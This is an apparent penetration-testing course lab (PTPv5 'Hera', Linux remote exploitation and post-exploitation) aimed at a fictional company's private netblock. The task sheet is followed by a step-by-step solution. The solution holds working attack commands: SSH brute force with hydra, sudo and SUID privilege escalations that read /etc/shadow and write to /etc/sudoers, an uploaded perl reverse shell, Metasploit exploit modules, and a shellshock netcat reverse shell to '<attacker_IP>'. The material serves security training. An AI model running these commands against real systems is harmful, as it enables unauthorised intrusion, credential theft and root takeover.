© 2018 Caendra Inc.

| Hera for PTPv5 | Linux Exploitation (Remote Exploitation 1

& Post-Exploitation)
Your quest for root continues as you enter into the remote exploitation and post-exploitation
phases of the Penetration Testing engagement for Robots To Go, Inc. During this phase, you
uncover multiple points of entry into the target organizations’ network, and furthermore,
are able to maintain an even stronger foothold.

Target Organization: Robots To Go, Inc.

Scope: The scope is limited to the following domain and netblock:

1. Netblock: 172.16.80.1/24
2. Domain: robotstogo.localdomain

Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems.

• Identify Vulnerabilities from a Remote Exploitation perspective.

• Exploit Discovered Vulnerabilities or misconfigurations.
• Obtain access to systems as a low-privileged user, and elevate privileges to root.

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 2
& Post-Exploitation)
 • Metasploit
• Nmap
• Bash Shell
• Netcat

The system at 172.16.80.27 contains an unauthenticated backdoor. Locate the backdoor

and obtain access to the system. Once access has been obtained through this backdoor,
document your current user and elevate your privileges to root using local enumeration
techniques. Write your findings below.

On which port was the backdoor discovered, what user is the backdoor running
under, and what method was used to obtain root-level access as that user?

Backdoor Port on Backdoor is running as which Method used to Elevate to Root

172.16.80.27 user?

Of the users discovered via SMB enumeration, obtain access to 172.16.80.27 via SSH
using one of them. Once access has been obtained with that user account, elevate
privileges to root. Write your findings below.

User Account used to obtain Users Password Method Used To Elevate

access via SSH on Privileges
172.16.80.27

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 3
& Post-Exploitation)
Of the available SMB shares discovered during the enumeration of 172.16.80.27, one
of them can be exploited to obtain access to the server. Exploit this finding to obtain
access to 172.16.80.27 and describe your method below:

Samba Share Of Interest Method used to obtain Obtained access as which

access to the system via user?
the share.

172.16.80.22 contains a remotely exploitable RMI Registry vulnerability. Exploit the

vulnerability, and once access has been obtained as a low privileged user, identify a
vulnerability in the kernel. Exploit the kernel vulnerability and obtain root access.

Obtained access initially as which Kernel Vulnerability exploited to obtain root

user? access

172.16.80.22 contains several remotely exploitable vulnerabilities within its Samba

server. Exploit the server to obtain access to the file system to conduct additional
enumeration.

Vulnerability Exploited Level of Access obtained

172.16.80.22 contains a remotely exploitable vulnerability on a web server port.

Exploit the vulnerability and obtain access as the web server user via a shell. Use this
access to elevate your privileges to root.

Vulnerability Exploited Vulnerable File Method used to Elevate to

Root

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 4
& Post-Exploitation)
© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 5
& Post-Exploitation)
Below, you can find solutions for each task for the Remote Exploitation and Post-
Exploitation tasks. Remember though that you can follow your own strategy (which may
be different from the one explained in the following lab). Additionally, the labs contain
additional vulnerabilities not covered below which can also be exploited but may not
necessarily be required to complete the tasks below. Exploit as many of the vulnerabilities
you find!

Using Nmap during our enumeration phase and while conducting a SYN scan for all 65535
ports, we should have discovered a port listening on 60666 on 172.16.80.27:

# nmap -sS 172.16.80.27 -p1-65535

Using netcat (nc), when connecting to the 60666 port, we notice that the system is opening
up another port (60667). While leaving that connection open, in another terminal, we netcat
the newly opened 60667 port and find we are connected to a bind shell, and can execute
commands as a user “Jordan”:

# nc 172.16.80.27 60666 (In one terminal)

# nc 172.16.80.27 60667 (In the second terminal)

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 6
& Post-Exploitation)
We can then upgrade our shell using a python shell upgrade one-liner:

$ python -c ‘import pty; pty.spawn(“/bin/bash”)’

Now after conducting some simple enumeration, we find that “Jordan” has the ability to sudo
as root the nano editor for a certain file (readme.txt) in /home/*/*/readme.txt:

$ sudo -l

Seeing as the sudo command is requiring that a file called “readme.txt” be created in a
subdirectory of jordans home directory, we can create the subdirectory, but instead of
creating a “readme.txt” file, we’ll create a symbolic link from “readme.txt” to the
/etc/shadow file:

$ cd /home/jordan && mkdir foo && cd foo

$ ln -s /etc/shadow readme.txt

Listing the directory shows we’ve created a symbolic link to the /etc/shadow file, as the
“Readme.txt” file:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 7
& Post-Exploitation)
Once this is done, we can sudo the nano program to read the readme.txt file, which should
display the /etc/shadow file, but we notice that a proper terminal hasn’t been exported to
the users’ TERM environment variable:

We first need to add an environment variable for “TERM” to use xterm with the following
command:

$ export TERM=xterm

Once we’ve defined the TERM environment variable, we can then read the readme.txt file
(which is a symbolic link to the privileged /etc/shadow file):

$ sudo /bin/nano /home/jordan/foo/readme.txt

In addition to the above explanation, the above Nano Wildcard Directory Symlink
vulnerability can be exploited in multiple ways to gain root to the system. Use your
imagination and see what other ways you can exploit it for a root shell!

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 8
& Post-Exploitation)
During enumeration phases, and using enum4linux against 172.16.80.27, we should have
obtained a user list:

# enum4linux -a 172.16.80.27

Of the users discovered, we find that we can execute a dictionary attack using the first 500
entries of the rockyou.txt wordlist and are able to crack the password for the “james” user.

Create a password list of 500 entries from the rockyou.txt wordlist file, and save it to another
file:

# head -n 500 /usr/share/wordlists/rockyou.txt > top-500.txt

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 9
& Post-Exploitation)
Execute a hydra attack against the SSH port on 172.16.80.27 for the james user (or all of the
users discovered), when complete, you should be able to crack the password for james on
the 172.16.80.27 machine:

# hydra -l james -P top-500.txt ssh://172.16.80.27

Using the password, we SSH to 172.16.80.27 as james, and after conducting some local
enumeration, find that james can sudo the “/usr/sbin/tcpdump” command. James’ sudo
entry is provided to us once we issue the “sudo -l” command, and enter his password, which
we previously obtained via the SSH dictionary attack:

Some basic research on using “tcpdump” to elevate our privileges when it is defined as a
sudo entry for a user reveals that we can take the following steps to obtain root: (tcpdump
allows for execution of arbitrary commands with a specially constructed command-line)

1. Write a file to /tmp, in this case, we’ll call the file “elevate,” with the following
contents:

#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers

We can use the cat command to redirect our contents to the /tmp/elevate file like so:

$ cat > /tmp/elevate

#!/bin/bash
echo “james ALL=(root) NOPASSWD: ALL” >> /etc/sudoers
^C (PRESS CTRL-C TO WRITE THE FILE)

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 10
& Post-Exploitation)
 2. We then set the executable bit for our /tmp/elevate file:

$ chmod +x /tmp/elevate

3. We can then run the following sudo command for tcpdump:

$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/elevate -Z root

The above tcpdump command, as sudo (root), along with our “elevate” file, will write a new
entry to the /etc/sudoers file for james, whose shell can then be immediately upgraded to
root with a “sudo bash” command:

$ sudo bash
# id
uid=0(root) gid=0(root) groups=0(root)

During enumeration of the Samba server on IP address 172.16.80.27, we should have

uncovered an available share called “web” which we also find is configured with “READ” and
“WRITE” permissions:

# smbmap -H 172.16.80.27

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 11
& Post-Exploitation)
We also find that anonymous access is allowed to the share using Nmap with the “smb-enum-
shares” script:

# nmap --script smb-enum-shares 172.16.80.27

Having this information, we use smbclient to connect to the share while providing no
password and blank user (anonymous access), and list the shares contents:

# smbclient -N \\\\172.16.80.27\\web -U “”
smb: \> ls
info.pl A 283 Sat Jan 20 01:46:57 2018

We upload a perl reverse shell (/usr/share/webshells/perl/perl-reverse-shell.pl

available on kali) to the server after modifying it with our attacker IP and Port we will use
for a netcat listener:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 12
& Post-Exploitation)
Upload the perl-reverse-shell.pl file to the “web” share using smbclient:

# smb: \> put perl-reverse-shell.pl

In another terminal, we set up a netcat listener on port 1234:

# nc -nlvp 1234

We then browse to the perl-reverse-shell.pl on “172.16.80.27” and receive a reverse shell as

the www-data user:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 13
& Post-Exploitation)
During enumeration of the systems for vulnerabilities and having conducted a port scan for
all ports, we find that “172.16.80.22” contains an RMI Registry service listening on a non-
standard port of 1999. Research on RMI Registry of the particular version found finds that it
is vulnerable to arbitrary loading of java classes.

We use metasploit’s “java_rmi_server” exploit module against the “172.16.80.22” system:

# msf > use exploit/multi/misc/java_rmi_server

# msf > set RHOST 172.16.80.22
# msf> set RPORT 1999 (CHANGE THIS TO THE NON-STANDARD PORT DISCOVERED FOR
THE RMI SERVICE)
# msf> set SRVHOST 172.16.80.5 (TESTER IP)
# msf > exploit

We now have a meterpreter session opened up on 172.16.80.22 as user “todd”:

# msf exploit(multi/misc/java_rmi_server) > sessions

We can then interact with the session, and launch a shell:

# msf > sessions -i 1

We can then once again, use the python tty spawn one-liner to get a proper shell on the
system and check our current kernel version with the “uname -a” command:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 14
& Post-Exploitation)
$ python -c ‘import pty; pty.spawn(“/bin/bash”)’

Our kernel version shows that the system is running an older kernel version of “2.6.24-16.”
We check exploit-db for vulnerabilities related to that kernel version 2.6, and find that it is
potentially vulnerable to a “udev” exploit, among others:

https://www.exploit-db.com/exploits/21848/

There is a Metasploit module available for this particular kernel exploit, so let’s load that
exploit and set it up for our current meterpreter session:

First, we send our current session into the background with “Ctrl-Z,” then type “background”:

We then search for the udev exploit, and load the available exploit module:

# msf > search udev

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 15
& Post-Exploitation)
# msf > use exploit/linux/local/udev_netlink

We then set our SESSION value to the current meterpreter session and set your LHOST:

# msf > set SESSION 1

# msf > set LHOST 172.16.80.5

And run the exploit:

# msf > exploit

Note: Experiment with different payloads.

During post-exploitation of the machine “172.16.80.22” once we had gotten access as the
user “todd” via the udev kernel exploit, we should have determined the version of Samba on
the system with the following command to check for an exploitable Samba version:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 16
& Post-Exploitation)
$ smbd --version

Should give us the following output:

Version 3.0.20-Debian

After conducting additional enumeration as user “todd” of the Samba configuration in file
“/etc/samba/smb.conf,” we find that it is configured with an option that allows reading of
the root file system via a Symlink Directory Traversal Vulnerability, specifically, the “wide
links = yes” option.

Knowing this information, we can use the Metasploit Module “samba_symlink_traversal” and
try and see if we can read the /root/ filesystem once we run the module:

# msf > use auxiliary/admin/smb/samba_symlink_traversal

# msf > set RHOST 172.16.80.22
# msf > set SMBSHARE tmp (THIS REQUIRES A WRITEABLE SHARE, WHICH WE
DISCOVERED THROUGH ENUMERATION OF THIS HOST)
# msf > exploit

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 17
& Post-Exploitation)
We can now use smbclient to mount the “tmp” directory, and change into the “rootfs”
directory:

# smbclient -N \\\\172.16.80.22\\tmp -U “”
# smb: \> cd rootfs
# smb: \rootfs\> ls

From here, it is trivial to read the root file system, and download files that we may want to
conduct addition post-exploitation information gathering on:

# smb: \> cd etc

# smb: \: > get passwd

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 18
& Post-Exploitation)
During information gathering we determine that the system at IP address 172.16.80.22 is
running a web server on TCP port 80:

We use “dirsearch” to conduct a dictionary brute force attack of any potential

directories/files on the server with the “-r” (recursive) and “-f” option to force file extensions,
and specifically, we’ll search for any CGI files in this case:

# ./dirsearch.py -u http://172.16.80.22/ -e cgi -r -f

The scan quickly uncovers the existence of a “calendar.cgi” program in the “cgi-bin”
directory:

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 19
& Post-Exploitation)
Knowing that CGI programs, in particular, are of primary concern in regards to shellshock
vulnerabilities, we use Metasploit’s “apache_mod_cgi_bash_env” module to check for
exploitability, making sure to configure the correct options, including the TARGETURI value:

# msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env

# msf > set RHOSTS 172.16.80.22
# msf > set TARGETURI cgi-bin/calendar.cgi
# msf > exploit

The server returns the output of the “id” command, which confirms that the exploit (with its
default CMD value of “id”) was successful:

We exploit this, to obtain a reverse shell as the “www-data” user by modifying the “CMD”
value in the Metasploit module to execute a netcat reverse shell back to our attacker system
where we have a netcat listener running.

First, modify the CMD variable to launch a netcat reverse shell:

# msf > set CMD “/bin/nc <attacker_IP> 1234 -e /bin/sh”

Now we make sure we have a netcat listener running on our attacker machine:

# nc -nlvp 1234

We then run the shellshock exploit module and should receive a reverse shell back to our
attacker system, and we can see we are the “www-data” user at this point by running the “id”
command to confirm:

# msf auxiliary(scanner/http/apache_mod_cgi_bash_env) > exploit

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 20
& Post-Exploitation)
We upgrade our shell with python, as we have done previously with other tasks:

$ python -c 'import pty; pty.spawn("/bin/sh")'

We can then conduct some post-exploitation enumeration and find a way to obtain root
privileges. We do so, and find that “nmap” is configured as a SUID root executable, and
furthermore, we determine that it allows the “--interactive” mode which as we know, can
give us a root shell if nmap is SUID root:

$ find / -perm -4000 2>/dev/null

We run nmap with “--interactive” mode switch to escape to a shell, and escalate our
privileges to that of Effective User ID (EUID) “root”:

sh-3.2$ nmap --interactive

nmap> !sh

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 21
& Post-Exploitation)
Once again, we are root!

© 2018 Caendra Inc. | Hera for PTPv5 | Linux Exploitation (Remote Exploitation 22
& Post-Exploitation)